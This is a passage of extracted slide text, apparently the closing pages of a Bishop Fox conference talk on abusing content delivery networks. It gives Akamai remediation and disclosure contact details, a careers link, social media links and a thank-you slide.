• Akamai has been super supportive to us throughout this disclosure process.
• In order to address this vulnerability, they have provided us with instructions on remediation if you are vulnerable.
HOW DO I FIX THIS?
Remediation
![Page 110: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/110.jpg)
• You may already be patched!
• If you are an Akamai customer you need to call Akamai’s support line at 1-617-444-4699 or email them at [email protected].
• Public inquiries can be directed to Rob Morton at 1-617-444-3641 or [email protected].
HOW DO I FIX THIS?
How Do I Remediate?
![Page 111: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/111.jpg)
• If you are a security researcher with a vulnerability in Akamai you can reach them at [email protected].
• They have a PGP key available on their website that you can use for more sensitive communications.
• Akamai is hiring folks at: https://www.akamai.com/us/en/about/careers/index.jsp.
HOW DO I FIX THIS?
Future Security Research
![Page 112: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/112.jpg)
@BISHOPFOX
FACEBOOK.COM/BISHOPFOXCONSULTING
LINKEDIN.COM/COMPANY/BISHOP-FOX
GOOGLE.COM/+BISHOPFOX
Contact Us
![Page 113: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/113.jpg)
Thank you